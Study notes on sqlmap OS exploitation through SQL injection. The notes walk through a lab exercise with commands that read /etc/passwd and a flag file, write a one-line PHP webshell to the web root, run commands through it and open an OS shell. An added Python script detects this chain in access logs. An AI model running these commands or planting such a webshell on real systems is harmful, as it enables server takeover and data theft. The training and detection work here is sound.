# File Read/Write

- The first part of OS exploitation through an SQL injection vulnerability is reading and writing data on the hosting server
- Reading data is much more common than writing data, which is strictly privileged in modern DBMSes, as it can lead to system exploitation, as we will see
- For example, in MySQL, to read local files, the DB user must have the `LOAD DATA` and `INSERT` privileges, to be able to load the content of a file into a table and then read that table
- While we do not necessarily need DBA privileges to read data, this requirement is becoming more common in modern DBMSes

## Checking for DBA Privs

```bash
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
```

## Reading Local Files

```bash
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
```

## Writing Local Files

- When it comes to writing files to the hosting server, it becomes much more restricted in modern DBMSes, since we can utilize this to write a web shell on the remote server, and hence get code execution and take over the server
- This is why modern DBMSes disable file-write by default and need certain privileges for DBAs to be able to write files
- For example, in MySQL, the `--secure-file-priv` configuration must be manually disabled to allow writing data into local files using the `INTO OUTFILE` SQL query, in addition to any local access needed on the host server, like the privilege to write in the directory we need
- However, many web apps require the ability for DBMSes to write data into files, so it is worth testing whether we can write files to the remote server
- To do that with SQLMap, we can use the `--file-write` and `--file-dest` options
- Preparing a simple PHP webshell

```bash
echo '<?php system($_GET["cmd"]); ?>' > shell.php
```

- Attempt to write `shell.php` within the `/var/www/html/` directory on the webserver

```bash
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
```

- Now attempt to use the webshell

```bash
curl http://www.example.com/shell.php?cmd=ls+-la
```

# OS Command Execution

- SQLMap utilizes various techniques to get a remote shell through SQL injection vulnerabilities, like writing a remote shell, as we just did, writing SQL functions that execute commands and retrieve output, or even using some SQL queries that directly execute OS commands, like `xp_cmdshell` in Microsoft SQL Server
- To get an OS shell with SQLMap, we can use the `--os-shell` option

```bash
sqlmap -u "http://www.example.com/?id=1" --os-shell
```

# Exercise

- Use the SQLi vulnerability in the GET parameter `id` to exploit the host OS

## Read flag.txt

- Try to use SQLMap to read the file `/var/www/html/flag.txt`
- First, check DBA privs - TRUE

```bash
sqlmap -u "http://94.237.51.160:36246/?id=1" --is-dba
```

![[images/Pasted image 20251209204255.png]]

- Second, try to read the flag - GUCCI

```bash
sqlmap -u "http://94.237.51.160:36246/?id=1" --file-read "/var/www/html/flag.txt"
```

![[images/Pasted image 20251209204448.png]]

## Gain an interactive OS Shell

- Attempt to upload a PHP webshell

```bash
echo '<?php system($_GET["cmd"]); ?>' > shell.php
cat shell.php
<?php system($_GET["cmd"]); ?>
sqlmap -u "http://94.237.51.160:36246/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
```

![[images/Pasted image 20251209204708.png]]

- Attempt to interact with the webshell - SUCCESS!

```bash
curl http://94.237.51.160:36246/shell.php?cmd=id
```

![[images/Pasted image 20251209204918.png]]

- Navigate to the flag and grab it - BAM

![[images/Pasted image 20251209205202.png]]
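From the defender's side, the file-write and webshell steps covered in the Writing Local Files and OS Command Execution sections leave a recognisable trail in the web server's access log. The following Python script is an added example, not part of the original notes: it scans constructed Apache combined-format log lines for the MySQL file primitives sqlmap relies on (`LOAD_FILE`, `INTO OUTFILE`/`DUMPFILE`), the sqlmap User-Agent, `cmd=` requests to `.php` files, and any later request for a file an earlier `INTO OUTFILE` named. The log lines, IPs and User-Agent strings are constructed samples.

```python
"""Added detection example: flag the SQLi file-write / webshell chain in access logs.
Sample lines are constructed (documentation IP ranges), not from a real server."""
import os
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
203.0.113.5 - - [09/Dec/2025:20:44:10 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Dec/2025:20:47:02 +0000] "GET /?id=1%20UNION%20SELECT%20%27x%27%20INTO%20OUTFILE%20%27/var/www/html/shell.php%27--%20- HTTP/1.1" 200 498 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.5 - - [09/Dec/2025:20:49:18 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 71 "-" "curl/8.0"
198.51.100.9 - - [09/Dec/2025:20:50:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# MySQL-side primitives behind sqlmap's --file-read / --file-write
FILE_READ_RE = re.compile(r"\bLOAD_FILE\s*\(", re.IGNORECASE)
FILE_WRITE_RE = re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\s*'([^']+)'", re.IGNORECASE)
# Command-parameter shape of the one-line PHP shell shown in the notes
WEBSHELL_RE = re.compile(r"\.php\?(?:[^#]*&)?cmd=", re.IGNORECASE)


def scan_access_log(text):
    """Return (ip, reasons, decoded_request) for each suspicious line; reasons are
    sql-file-read, sql-file-write, sqlmap-ua, webshell-cmd, written-file-accessed."""
    findings, written = [], set()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        req = unquote_plus(m["path"])  # decode %xx so SQL keywords are visible
        reasons = []
        if FILE_READ_RE.search(req):
            reasons.append("sql-file-read")
        w = FILE_WRITE_RE.search(req)
        if w:
            reasons.append("sql-file-write")
            written.add(os.path.basename(w.group(1)))  # remember e.g. shell.php
        if m["ua"].lower().startswith("sqlmap"):
            reasons.append("sqlmap-ua")
        if WEBSHELL_RE.search(req):
            reasons.append("webshell-cmd")
        if os.path.basename(req.split("?", 1)[0]) in written:
            reasons.append("written-file-accessed")  # correlate write -> access
        if reasons:
            findings.append((m["ip"], reasons, req))
    return findings
```

Run it against a real combined-format log by passing the file contents to `scan_access_log`; a `sql-file-write` hit followed by `written-file-accessed` from the same IP is the sequence the notes above produce.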